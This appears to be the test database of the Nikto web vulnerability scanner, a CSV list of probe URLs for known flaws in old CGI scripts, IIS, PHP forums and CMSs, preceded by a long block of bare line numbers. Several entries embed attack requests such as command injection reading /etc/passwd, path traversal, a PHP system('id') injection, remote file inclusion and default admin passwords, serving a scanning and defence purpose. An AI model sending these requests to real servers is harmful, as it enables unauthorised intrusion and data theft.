5288
5289
5290
5291
5292
5293
5294
5295
5296
5297
5298
5299
5300
5301
5302
5303
5304
5305
5306
5307
5308
5309
5310
5311
5312
5313
5314
5315
5316
5317
5318
5319
5320
5321
5322
5323
5324
5325
5326
5327
5328
5329
5330
5331
5332
5333
5334
5335
5336
5337
5338
5339
5340
5341
5342
5343
5344
5345
5346
5347
5348
5349
5350
5351
5352
5353
5354
5355
5356
5357
5358
5359
5360
5361
5362
5363
5364
5365
5366
5367
5368
5369
5370
5371
5372
5373
5374
5375
5376
5377
5378
5379
5380
5381
5382
5383
5384
5385
5386
5387
5388
5389
5390
5391
5392
5393
5394
5395
5396
5397
5398
5399
5400
5401
5402
5403
5404
5405
5406
5407
5408
5409
5410
5411
5412
5413
5414
5415
5416
5417
5418
5419
5420
5421
5422
5423
5424
5425
5426
5427
5428
5429
5430
5431
5432
5433
5434
5435
5436
5437
5438
5439
5440
5441
5442
5443
5444
5445
5446
5447
5448
5449
5450
5451
5452
5453
5454
5455
5456
5457
5458
5459
5460
5461
5462
5463
5464
5465
5466
5467
5468
5469
5470
5471
5472
5473
5474
5475
5476
5477
5478
5479
5480
5481
5482
5483
5484
5485
5486
5487
5488
5489
5490
5491
5492
5493
5494
5495
5496
5497
5498
5499
5500
5501
5502
5503
5504
5505
5506
5507
5508
5509
5510
5511
5512
5513
5514
5515
5516
5517
5518
5519
5520
5521
5522
5523
5524
5525
5526
5527
5528
5529
5530
5531
5532
5533
5534
5535
5536
5537
5538
5539
5540
5541
5542
5543
5544
5545
5546
5547
5548
5549
5550
5551
5552
5553
5554
5555
5556
5557
5558
5559
5560
5561
5562
5563
5564
5565
5566
5567
5568
5569
5570
5571
5572
5573
5574
5575
5576
5577
5578
5579
5580
5581
5582
5583
5584
5585
5586
5587
5588
5589
5590
5591
5592
5593
5594
5595
5596
5597
5598
5599
5600
5601
5602
5603
5604
5605
5606
5607
5608
5609
5610
5611
5612
5613
5614
5615
5616
5617
5618
5619
5620
5621
5622
5623
5624
5625
5626
5627
5628
5629
5630
5631
5632
5633
5634
5635
5636
5637
5638
5639
5640
5641
5642
5643
5644
5645
5646
5647
5648
5649
5650
5651
5652
5653
5654
5655
5656
5657
5658
5659
5660
5661
5662
5663
5664
5665
5666
5667
5668
5669
5670
5671
5672
5673
5674
5675
5676
5677
5678
5679
5680
5681
5682
5683
5684
5685
5686
5687
5688
5689
5690
5691
5692
5693
5694
5695
5696
5697
5698
5699
5700
5701
5702
5703
5704
5705
5706
5707
5708
5709
5710
5711
5712
5713
5714
5715
5716
5717
5718
5719
5720
5721
5722
5723
5724
5725
5726
5727
5728
5729
5730
5731
5732
5733
5734
5735
5736
5737
5738
5739
5740
5741
5742
5743
5744
5745
5746
5747
5748
5749
5750
5751
5752
5753
5754
5755
5756
5757
5758
5759
5760
5761
5762
5763
5764
5765
5766
5767
5768
5769
5770
5771
5772
5773
5774
5775
5776
5777
5778
5779
5780
5781
5782
5783
5784
5785
5786
5787
5788
5789
5790
5791
5792
5793
5794
5795
5796
5797
5798
5799
5800
5801
5802
5803
5804
5805
5806
5807
5808
5809
5810
5811
5812
5813
5814
5815
5816
5817
5818
5819
5820
5821
5822
5823
5824
5825
5826
5827
5828
5829
5830
5831
5832
5833
5834
5835
5836
5837
5838
5839
5840
5841
5842
5843
5844
5845
5846
5847
5848
5849
5850
5851
5852
5853
5854
5855
5856
5857
5858
5859
5860
5861
5862
5863
5864
5865
5866
5867
5868
5869
5870
5871
5872
5873
5874
5875
5876
5877
5878
5879
5880
5881
5882
5883
5884
5885
5886
5887
5888
5889
5890
5891
5892
5893
5894
5895
5896
5897
5898
5899
5900
5901
5902
5903
5904
5905
5906
5907
5908
5909
5910
5911
5912
5913
5914
5915
5916
5917
5918
5919
5920
5921
5922
5923
5924
5925
5926
5927
5928
5929
5930
5931
5932
5933
5934
5935
5936
5937
5938
5939
5940
5941
5942
5943
5944
5945
5946
5947
5948
5949
5950
5951
5952
5953
5954
5955
5956
5957
5958
5959
5960
5961
5962
5963
5964
5965
5966
5967
5968
5969
5970
5971
5972
5973
5974
5975
5976
5977
5978
5979
5980
5981
5982
5983
5984
5985
5986
5987
5988
5989
5990
5991
5992
5993
5994
5995
5996
5997
5998
5999
6000
6001
6002
6003
6004
6005
6006
6007
6008
6009
6010
6011
6012
6013
6014
6015
6016
6017
6018
6019
6020
6021
6022
6023
6024
6025
6026
6027
6028
6029
6030
6031
6032
6033
6034
6035
6036
6037
6038
6039
6040
6041
6042
6043
6044
6045
6046
6047
6048
6049
6050
6051
6052
6053
6054
6055
6056
6057
6058
6059
6060
6061
6062
6063
6064
6065
6066
6067
6068
6069
6070
6071
6072
6073
6074
6075
6076
6077
6078
6079
6080
6081
6082
6083
6084
6085
6086
6087
6088
6089
6090
6091
6092
6093
6094
6095
6096
6097
6098
6099
6100
6101
6102
6103
6104
6105
6106
6107
6108
6109
6110
6111
6112
6113
6114
6115
6116
6117
6118
6119
6120
6121
6122
6123
6124
6125
6126
6127
6128
6129
6130
6131
6132
6133
6134
6135
6136
6137
6138
6139
6140
6141
6142
6143
6144
6145
6146
6147
6148
6149
6150
6151
6152
6153
6154
6155
6156
6157
6158
6159
6160
6161
6162
6163
6164
6165
6166
6167
6168
6169
6170
6171
6172
6173
6174
6175
6176
6177
6178
6179
6180
6181
6182
6183
6184
6185
6186
6187
6188
6189
6190
6191
6192
6193
6194
6195
6196
6197
6198
6199
6200
6201
6202
6203
6204
6205
6206
6207
6208
6209
6210
6211
6212
6213
6214
6215
6216
6217
6218
6219
6220
6221
6222
6223
6224
6225
6226
6227
6228
6229
6230
6231
6232
6233
6234
6235
6236
6237
6238
6239
6240
6241
6242
6243
6244
6245
6246
6247
6248
6249
6250
6251
6252
6253
6254
6255
6256
6257
6258
6259
6260
6261
6262
6263
6264
6265
6266
6267
6268
6269
6270
6271
6272
6273
6274
6275
6276
6277
6278
6279
6280
6281
6282
6283
6284
6285
6286
6287
6288
6289
6290
6291
6292
6293
6294
6295
6296
6297
6298
6299
6300
6301
6302
6303
6304
6305
6306
6307
6308
6309
6310
6311
6312
6313
6314
6315
6316
6317
6318
6319
6320
6321
6322
6323
6324
6325
6326
6327
6328
6329
6330
6331
6332
6333
6334
6335
6336
6337
6338
6339
6340
6341
6342
6343
6344
6345
6346
6347
6348
6349
6350
6351
6352
6353
6354
6355
6356
6357
6358
6359
6360
6361
6362
6363
6364
6365
6366
6367
6368
6369
6370
6371
6372
6373
6374
6375
6376
6377
6378
6379
6380
6381
6382
6383
6384
6385
6386
6387
6388
6389
6390
6391
6392
6393
6394
6395
6396
6397
6398
6399
6400
6401
6402
6403
6404
6405
6406
6407
6408
6409
6410
6411
6412
6413
6414
6415
6416
6417
6418
6419
6420
6421
6422
6423
6424
6425
6426
6427
6428
6429
6430
6431
6432
6433
6434
6435
6436
6437
6438
6439
6440
6441
6442
6443
6444
6445
6446
6447
6448
6449
6450
6451
6452
6453
6454
6455
6456
6457
6458
6459
6460
6461
6462
6463
6464
6465
6466
6467
6468
6469
6470
6471
6472
6473
6474
6475
#VERSION,2.017
# $Id: db_tests 632 2011-02-19 02:49:31Z sullo $
#######################################################################
# Source: http://cirt.net
# This file may only be distributed and used with the full Nikto package.
# This file may not be used with any software product without written permission from CIRT, Inc.
# (c) 2007 CIRT, Inc., All Rights Reserved.
#
# NOTE: By sending any database updates to CIRT, Inc., it is assumed that you
# grant CIRT, Inc., the unlimited, non-exclusive right to reuse, modify and relicense the changes.
#######################################################################
# Notes:
# Tuning options (field 3):
# 0 - File Upload
# 1 - Interesting File / Seen in logs
# 2 - Misconfiguration / Default File
# 3 - Information Disclosure
# 4 - Injection (XSS/Script/HTML)
# 5 - Remote File Retrieval - Inside Web Root
# 6 - Denial of Service
# 7 - Remote File Retrieval - Server Wide
# 8 - Command Execution / Remote Shell
# 9 - SQL Injection
# a - Authentication Bypass
# b - Software Identification
# c - Remote source inclusion
#######################################################################
"000001","0","b","/TiVoConnect?Command=QueryServer","GET","Calypso Server","","","","","The Tivo Calypso server is running. This page will display the version and platform it is running on. Other URLs may allow download of media.","",""
"000002","0","b","/TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes","GET","TiVoContainer","","","","","TiVo client service is running and may allow download of mp3 or jpg files.","",""
"000003","0","1234576890ab","@CGIDIRScart32.exe","GET","200","","","","","request cart32.exe/cart32clientlist","",""
"000004","0","1234576890ab","@CGIDIRSclassified.cgi","GET","200","","","","","Check Phrack 55 for info by RFP","",""
"000005","0","1234576890ab","@CGIDIRSdownload.cgi","GET","200","","","","","v1 by Matt Wright; check info in Phrack 55 by RFP","",""
"000006","0","1234576890ab","@CGIDIRSflexform.cgi","GET","200","","","","","Check Phrack 55 for info by RFP, allows to append info to writable files.","",""
"000007","0","1234576890ab","@CGIDIRSflexform","GET","200","","","","","Check Phrack 55 for info by RFP, allows to append info to writable files.","",""
"000008","0","1234576890ab","@CGIDIRSlwgate.cgi","GET","200","","","","","Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7","",""
"000009","0","1234576890ab","@CGIDIRSLWGate.cgi","GET","200","","","","","Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7","",""
"000010","0","1234576890ab","@CGIDIRSlwgate","GET","200","","","","","Check Phrack 55 for info by RFP","",""
"000011","0","1234576890ab","@CGIDIRSLWGate","GET","200","","","","","Check Phrack 55 for info by RFP","",""
"000012","0","1234576890ab","@CGIDIRSperlshop.cgi","GET","200","","","","","v3.1 by ARPAnet.com; check info in Phrack 55 by RFP","",""
"000013","0","1234576890ab","/cfappman/index.cfm","GET","200","","not found","","","susceptible to ODBC/pipe-style exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm","",""
"000014","0","1234576890ab","/cfdocs/examples/cvbeans/beaninfo.cfm","GET","200","","not found","","","susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm","",""
"000015","0","1234576890ab","/cfdocs/examples/parks/detail.cfm","GET","200","","not found","","","susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm","",""
"000016","0","1234576890ab","/kboard/","GET","200","","","","","KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php","",""
"000017","0","1234576890ab","/lists/admin/","GET","200","","","","","PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist","",""
"000018","0","1234576890ab","/splashAdmin.php","GET","200","","","","","Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely."," ",""
"000019","0","1234576890ab","/ssdefs/","GET","200","","","","","Siteseed pre 1.4.2 has 'major' security problems.","",""
"000020","0","1234576890ab","/sshome/","GET","200","","","","","Siteseed pre 1.4.2 has 'major' security problems.","",""
"000021","0","1234576890ab","/tiki/","GET","200","","","","","Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin","",""
"000022","0","1234576890ab","/tiki/tiki-install.php","GET","200","","","","","Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin","",""
"000023","0","1234576890ab","/scripts/samples/details.idc","GET","200","","","","","See RFP 9901; www.wiretrip.net","",""
"000024","396","6","/_vti_bin/shtml.exe","GET","200","","","","","Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.","",""
"000025","0","1","@CGIDIRShandler.cgi","GET","200","","","","","Variation of Irix Handler? Has been seen from other CGI scanners.","",""
"000026","0","28","@CGIDIRSfinger","GET","200","","","","","finger other users, may be other commands?","",""
"000027","0","28","@CGIDIRSfinger.pl","GET","200","","","","","finger other users, may be other commands?","",""
"000028","0","3","@CGIDIRSformmail.cgi","GET","Version ","","","","","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.","",""
"000029","0","3","@CGIDIRSformmail.pl","GET","Version ","","","","","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.","",""
"000030","0","3","@CGIDIRSformmail","GET","Version ","","","","","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.","",""
"000031","0","3","@CGIDIRSget32.exe","GET","200","","","","","This can allow attackers to execute arbitrary commands remotely.","",""
"000032","0","3","@CGIDIRSgm-authors.cgi","GET","200","","","","","GreyMatter 'password' file, that controls who can post. This contains login and password information and is installed mode 666 by default. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.","",""
"000033","0","3","@CGIDIRSguestbook/passwd","GET","200","","","","","GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.","",""
"000034","3233","3","@CGIDIRShorde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","",""
"000035","0","3","@CGIDIRSphoto/protected/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more. Versions before 3.8 allowed anyone to view contents of any directory on systems.","",""
"000036","0","3","@CGIDIRSwrap.cgi","GET","200","","","","","possible variation: comes with IRIX 6.2; allows to view directories","",""
"000037","0","3","/./","GET","include\\\(\"","","","","","Appending '/./' to a directory may reveal PHP source code.","",""
"000038","637","23","/~root/","GET","200","","","","","Allowed to browse root's home directory.","",""
"000039","0","3","/cgi-bin/wrap","GET","200","","","","","comes with IRIX 6.2; allows to view directories","",""
"000040","0","3","/forums/@ADMINconfig.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","",""
"000041","0","3","/forums/config.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","",""
"000042","0","3","/ganglia/","GET","Cluster","","","","","Ganglia Cluster reports reveal detailed information.","",""
"000043","0","3","/guestbook/guestbookdat","GET","200","","","","","PHP-Gastebuch 1.60 Beta reveals sensitive information about its configuration.","",""
"000044","0","3","/guestbook/pwd","GET","200","","","","","PHP-Gastebuch 1.60 Beta reveals the md5 hash of the admin password.","",""
"000045","0","3","/help/","GET","200","","","","","Help directory should not be accessible","",""
"000046","2411","3","/hola/admin/cms/htmltags.php?datei=./sec/data.php","GET","200","","","","","hola-cms-1.2.9-10 may reveal the administrator ID and password.","",""
"000047","0","3","/horde/imp/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","",""
"000048","3233","3","/horde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","",""
"000049","3233","3","/imp/horde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","",""
"000050","0","3","/imp/horde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","",""
"000051","0","3","/index.html.bak","GET","[Ii]ndex [Oo]f ","","","","","The remote server (perhaps Web602) shows directory indexes if .bak is appended to the request.","",""
"000052","0","3","/index.html~","GET","[Ii]ndex [Oo]f ","","","","","The remote server (perhaps Web602) shows directory indexes if a ~ is appended to the request.","",""
"000053","621","7","/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc","GET","resolv\.conf","","","","","phpMyExplorer allows attackers to read directories on the server.","",""
"000054","8103","23","/global.inc","GET","200","","","","","PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php","",""
"000055","0","3b","@CGIDIRSformmail.pl","GET","200","","","","","Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.","",""
"000056","0","3b","@CGIDIRShorde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","",""
"000057","59620","4","/inc/common.load.php","GET","200","","","","","Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.","",""
"000058","59619","4","/inc/config.php","GET","200","","","","","Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.","",""
"000059","59618","4","/inc/dbase.php","GET","200","","","","","Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.","",""
"000060","0","6","@CGIDIRSvisadmin.exe","GET","200","","","","","This CGI allows an attacker to crash the web server. Remove it from the CGI directory.","",""
"000061","0","7","@CGIDIRShtml2chtml.cgi","GET","200","","","","","Html2Wml < 0.4.8 access local files via CGI, and more","",""
"000062","0","7","@CGIDIRShtml2wml.cgi","GET","200","","","","","Html2Wml < 0.4.8 access local files via CGI, and more","",""
"000063","358","7","@CGIDIRSpollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00","GET","root:","","","","","Poll_It_SSI_v2.0.cgi allows attackers to retrieve arbitrary files.","",""
"000064","0","8","@CGIDIRSecho.bat?&dir+c:\\","GET","200","","","","","This batch file may allow attackers to execute remote commands.","",""
"000065","0","8","@CGIDIRSexcite;IFS=\"$\";/bin/cat /etc/passwd","GET","root:","","200","","","Excite software is vulnerable to command execution.","",""
"000066","56","8","@CGIDIRSezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|","GET","200","","","","","EZShopper loadpage CGI command execution","",""
"000067","0","8","@CGIDIRSguestbook.cgi","GET","200","","","","","May allow attackers to execute commands as the web daemon.","",""
"000068","0","8","@CGIDIRSguestbook.pl","GET","200","","","","","May allow attackers to execute commands as the web daemon.","",""
"000069","0","8","@CGIDIRSss","GET","200","","","","","Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.","",""
"000070","14026","8","/forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\"","GET","uid=0","","","","","VBulletin forumdisplay.php remote command execution.","",""
"000071","2889","8","/guestbook/guestbook.html","GET","Jason Maloney","","","","","Jason Maloney CGI Guestbook 3.0 allows remote code execution. Bugtraq 2003-12-01","",""
"000072","0","8","/html/cgi-bin/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","",""
"000073","2703","9","/geeklog/users.php","GET","200","","","","","Geeklog prior to 1.3.8-1sr2 contains a SQL injection vulnerability that lets a remote attacker reset admin password.","",""
"000074","8204","a","/gb/index.php?login=true","GET","200","","","","","gBook may allow admin login by setting the value 'login' equal to 'true'.","",""
"000075","0","a","/guestbook/admin.php","GET","200","","","","","Guestbook admin page available without authentication.","",""
"000076","0","b","@CGIDIRSgH.cgi","GET","200","","","","","Web backdoor by gH","",""
"000077","0","b","@CGIDIRSgm-cplog.cgi","GET","200","","","","","GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.","",""
"000078","0","b","/getaccess","GET","200","","","","","This may be an indication that the server is running getAccess for SSO","",""
"000079","0","b","/help.html","GET","nice little interface into SPIKE","","","","","SPIKE Proxy may be running. Try using this port as a proxy, and see http://www.immunitysec.com/",".",""
"000080","0","3b","@CGIDIRSgm.cgi","GET","200","","","","","GreyMatter blogger may reveal user IDs/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.","",""
"000081","5292","c","/filemanager/filemanager_forms.php?lib_path=@RFIURL","GET","PHP Version","","","","","Some versions of PHProjekt allow remote file inclusions. Verify the current version is running. See http://www.securiteam.com/unixfocus/5PP0F1P6KS.html for more info","",""
"000082","0","1","@CGIDIRSAT-admin.cgi","GET","200","","","","","Admin interface...","",""
"000083","17111","23","@CGIDIRSauth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
"000084","0","23","@CGIDIRSawstats.pl","GET","Traffic","","","","","AWStats logfile analyzer.","",""
"000085","0","23","@CGIDIRSawstats/awstats.pl","GET","Traffic","","","","","Free realtime logfile analyzer for advanced web statistics. Should be protected.","",""
"000086","0","23b","@CGIDIRSblog/mt.cfg","GET","configuration file","","","","","Movable Type configuration file found. Should not be available remotely.","",""
"000087","2686","3","@CGIDIRScart.pl?db='","GET","c:\\\\","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","",""
"000088","2686","3","@CGIDIRScart.pl?db='","GET","d:\\\\","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","",""
"000089","292","3","@CGIDIRShtsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=","GET","ht:\\\/\\\/Dig","","","","","The ht://Dig install may reveal the path to its configuration files, revealing sensitive information about the server.","",""
"000090","0","3","@CGIDIRSmt-static/mt-check.cgi","GET","200","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.","",""
"000091","0","3","@CGIDIRSmt/mt-check.cgi","GET","200","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.","",""
"000092","0","3","/cfdocs/expeval/openfile.cfm","GET","200","","","","","Can use to expose the system/server path.","",""
"000093","0","3","/index.php/123","GET","Premature end of script headers","","","","","Some versions of PHP reveal PHP's physical path on the server by appending /123 to the PHP file name.","",""
"000094","7510","3","/mambo/index.php?Itemid=JUNK(5)","GET","exceeded in \/","","","","","Mambo Site Server 4.0.11 reveals the web server path.","",""
"000095","23654","3","/profile.php?u=JUNK(8)","GET","Warning:","","","","","Powerboards is vulnerable to path disclosure.","",""
"000096","0","3","/ticket.php?id=99999","GET","expects first argument","","","","","ZenTrack from http://zentrack.phpzen.net/ versions v2.0.3, v2.0.2beta and older reveal the web root with certain errors.","",""
"000097","4911","3","/vgn/login/1,501,,00.html?cookieName=x--\>","GET","value=\"x--","","","","","Vignette server may leak memory with an invalid request. Upgrade to the latest version.","",""
"000098","0","3","/a%5c.aspx","GET","Invalid file name for monitoring:","","","","","Older Microsoft .NET installations allow full path disclosure.","",""
"000099","0","7","@CGIDIRSbanner.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","",""
"000100","0","7","@CGIDIRSbannereditor.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","",""
"000101","599","7","@CGIDIRSbook.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","",""
"000102","0","7","/admin/browse.asp?FilePath=c:\&Opt=2&level=0","GET","winnt","","","","","Hosting Controller from hostingcontroller.com allows any file on the system to be read remotely.","",""
"000103","0","8","@CGIDIRSarchitext_query.pl","GET","200","","","","","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.","",""
"000104","0","8","@CGIDIRSbizdb1-search.cgi","GET","200","","","","","This CGI may allow attackers to execute commands remotely. See http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm","",""
"000105","0","b","@CGIDIRSblog/","GET","200","","","","","A blog was found. May contain security problems in CGIs, weak passwords, and more.","",""
"000106","0","b","/tsweb/","GET","200","","","","","Microsoft TSAC found. http://www.dslwebserver.com/main/fr_index.html?/main/sbs-Terminal-Services-Advanced-Client-Configuration.html","",""
"000107","0","1b","@CGIDIRSblog/mt-load.cgi","GET","200","","","","","Movable Type weblog installation CGI found. May be able to reconfigure or reload.","",""
"000108","14538","c","@CGIDIRSatk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL","GET","PHP Version","","","","","Achievo can be made to include PHP files from another domain. Upgrade to a new version.","",""
"000109","0","23","/vgn/performance/TMT","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000110","0","23","/vgn/performance/TMT/Report","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000111","0","23","/vgn/performance/TMT/Report/XML","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000112","0","23","/vgn/performance/TMT/reset","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000113","0","23","/vgn/ppstats","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000114","0","23","/vgn/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000115","0","23","/vgn/record/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000116","0","23","/vgn/stylepreviewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000117","0","23","/vgn/vr/Deleting","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000118","0","23","/vgn/vr/Editing","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000119","0","23","/vgn/vr/Saving","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000120","0","23","/vgn/vr/Select","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000121","0","23","/scripts/iisadmin/bdir.htr","GET","200","","","","","This default script shows host info, may allow file browsing and buffer a overrun in the Chunked Encoding data transfer mechanism, request /scripts/iisadmin/bdir.htr??c:\<dirs> . MS02-028. CA-2002-09.","",""
"000122","0","2a","/scripts/iisadmin/ism.dll","GET","200","","","","","Allows you to mount a brute force attack on passwords","",""
"000123","0","2a","/scripts/tools/ctss.idc","GET","200","","","","","This CGI allows remote users to view and modify SQL DB contents, server paths, docroot and more.","",""
"000124","0","3","/bigconf.cgi","GET","200","","","","","BigIP Configuration CGI","",""
"000125","0","3","/billing/billing.apw","GET","PASS BOX CAPTION:","","","","","CoffeeCup password wizard allows password files to be read remotely.","",""
"000126","0","3","/blah_badfile.shtml","GET","200","","","","","Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->",""
"000127","0","3","/blah-whatever-badfile.jsp","GET","Script \/","","","","","The web server is configured to respond with the web server path when requesting a non-existent .jsp file.","",""
"000128","4910","3","/vgn/style","GET","200","","","","","Vignette server may reveal system information through this file.","",""
"000129","0","3","/scripts/no-such-file.pl","GET","perl script","","","","","Using perl.exe allows attackers to view host info. Use perlis.dll instead.","",""
"000130","17653","3","/SiteServer/Admin/commerce/foundation/domain.asp","GET","200","","","","","Displays known domains of which that server is involved.","",""
"000131","17654","3","/SiteServer/Admin/commerce/foundation/driver.asp","GET","200","","","","","Displays a list of installed ODBC drivers.","",""
"000132","17655","3","/SiteServer/Admin/commerce/foundation/DSN.asp","GET","200","","","","","Displays all DSNs configured for selected ODBC drivers."," ",""
"000133","17652","3","/SiteServer/admin/findvserver.asp","GET","200","","","","","Gives a list of installed Site Server components.","",""
"000134","0","3","/SiteServer/Admin/knowledge/dsmgr/default.asp","GET","200","","","","","Used to view current search catalog configurations","",""
"000135","1909","4","@CGIDIRScgiwrap/%3Cfont%20color=red%3E","GET","<font color=red>","","","","","cgiwrap allows HTML and possibly XSS injection. See http://archives.neohapsis.com/archives/bugtraq/2001-07/0499.html for details.","",""
"000136","2878","4","@CGIDIRSmoin.cgi?test","GET","200","","","","","MoinMoin 1.1 and prior contain at least two XSS vulnerabilities. Version 1.0 and prior also contains a XSLT related vulnerability","",""
"000138","0","4","/basilix/mbox-list.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'message list' function/page","",""
"000139","0","4","/basilix/message-read.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'read message' function/page","",""
"000140","0","4","/clusterframe.jsp","GET","200","","","","","Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.","",""
"000141","0","4","/IlohaMail/blank.html","GET","200","","","","","IlohaMail 0.8.10 contains a XSS vulnerability. Previous versions contain other non-descript vulnerabilities.","",""
"000142","0","8","/bb-dnbd/faxsurvey","GET","200","","","","","This may allow arbitrary command execution.","",""
"000143","0","8","/cartcart.cgi","GET","200","","","","","If this is Dansie Shopping Cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands.","",""
"000144","6591","8","/scripts/Carello/Carello.dll","GET","200","","","","","Carello 1.3 may allow commands to be executed on the server by replacing hidden form elements. This could not be tested by Nikto.","",""
"000145","0","a","/scripts/tools/dsnform.exe","GET","200","","","","","Allows creation of ODBC Data Source","",""
"000146","0","a","/scripts/tools/dsnform","GET","200","","","","","Allows creation of ODBC Data Source","",""
"000147","17656","a","/SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp","GET","200","","","","","Used to create, modify, and potentially delete LDAP users and groups.","",""
"000148","17657","a","/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp","GET","200","","","","","Used to create, modify, and potentially delete LDAP users and groups.","",""
"000149","0","b","/prd.i/pgen/","GET","200","","","","","Has MS Merchant Server 1.0","",""
"000150","0","b","/readme.eml","GET","200","","","","","Remote server may be infected with the Nimda virus.","",""
"000151","0","b","/scripts/httpodbc.dll","GET","200","","","","","Possible IIS backdoor found.","",""
"000152","0","b","/scripts/proxy/w3proxy.dll","GET","502","","","","","MSProxy v1.0 installed","",""
"000153","0","b","/scripts/root.exe?/c+dir+c:\+/OG","GET","Directory of c","","","","","This machine is infected with Code Red, or has Code Red leftovers.","",""
"000154","0","b","/SiteServer/admin/","GET","403","","","","","Site Server components admin. Default account may be 'LDAP_Anonymous', pass is 'LdapPassword_1'. see http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm","",""
"000155","0","1","/siteseed/","GET","200","","","","","Siteseed pre 1.4.2 has 'major' security problems.","",""
"000156","0","2","/scripts/samples/search/author.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed. MS01-033.","",""
"000157","0","2","/scripts/samples/search/filesize.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed. MS01-033.","",""
"000158","0","2","/scripts/samples/search/filetime.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed. MS01-033.","",""
"000159","0","2","/scripts/samples/search/queryhit.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed. MS01-033.","",""
"000160","0","2","/scripts/samples/search/simple.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed. MS01-033.","",""
